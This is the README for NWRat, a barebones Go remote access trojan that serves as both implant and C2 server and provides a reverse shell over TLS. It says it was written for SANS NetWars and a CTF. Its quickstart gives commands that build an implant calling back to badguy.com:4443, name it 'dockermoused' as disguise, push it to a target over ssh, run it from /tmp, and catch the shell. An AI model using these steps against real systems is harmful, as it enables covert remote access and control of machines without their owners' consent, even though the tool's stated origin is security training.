README

1. NWRat
2. Barebones RAT which provides a shell over TLS. Originally written several years ago for SANS' NetWars, the source was lost and re-written for quite a long CTF which was part of a job interview.
3.  
4. As an implant, it's a single binary that tries to make a TLS connection to the C2 server at a set interval. If a connection is established, a shell is spawned and its stdio hooked up the TLS connection. Further connection attempts are still made when a shell is running to enable multiple shells on target (or if you forget -c when you ping something).
5.  
6. As a C2 server, it listens for a connection from the implant, does a TLS handshake, and proxies stdio to the connection. The listening socket is closed when a connection is accepted to enable catching multiple callbacks.
7.  
8. Features:
9.  
10. Single binary for both implant and server
11. Shell over TLS
12. Constant beacons
13. No fussing about someone else's post-exploitation code
14. Compile-time implant configuration
15. Cross-platform (though, only if /bin/sh exists on the platform)
16. Encrypted on the wire
17. Easy to set up and use
18. Documentation that assumes some familiarity with Go
19. For legal use only.
20.  
21. Quickstart
22. # Get the source
23. go get github.com/magisterquis/nwrat
24. # Build the C2 server for the local platform
25. go build github.com/magisterquis/nwrat
26. # Build an implant for a different platform, setting the callback address
27. GOOS=linux go build -o dockermoused -ldflags="-X main.callbackAddr=badguy.com:4443" github.com/magisterquis/nwrat
28. # Put the implant on target it and run it
29. ssh target 'cat >/tmp/dockermoused && chmod 0700 /tmp/dockermoused && /tmp/dockermoused &' <./dockermoused
30. # Catch a callback
31. ./nwrat -listen localhost:4443 -cert ./badguy.com.crt -key ./badguy.com.key
32. Implant
33. The implant is configured using Go linker directives. There are three options:
34.  
35. Option  Default Description
36. main.callbackInterval   1m  Callback interval, in Go's parseable duration syntax
37. main.callbackAddr   example.com:443 Callback address and port
38. main.implantDebug   unset   Set to any string to have the implant print debugging messages
39. As an example, to have the implant call back to kittens.com:4433 every three seconds and print debugging output, it would be built something like
40.  
41. go build -ldflags="-X main.callbackInterval=3s -X main.callbackAddr=kittens.com:4433 -X main.implantDebug=sure" github.com/magisterquis/nwrat
42. Editing the var block at the top also works.
43.  
44. Running the binary with no arguments causes it to function as the implant (as opposed to the C2 server).
45.  
46. C2 Server
47. When used with -listen the binary catches a callback. A listen address TLS certificate and key corresponding to the domain the implant experts need to be supplied via command-line options, similar to
48.  
49. ./nwrat -listen 0.0.0.0:4443 -cert ./badguy.com.crt -key ./badguy.com.key
50. It's not a bad idea to wrap nwrat in rlwrap or something similar, as there'll be no TTY or readline library.
51.  
52. When one side or the other disconnects, a message similar to
53.  
54. 2020/07/22 00:28:25 Sent 206 bytes to implant
55. will be logged.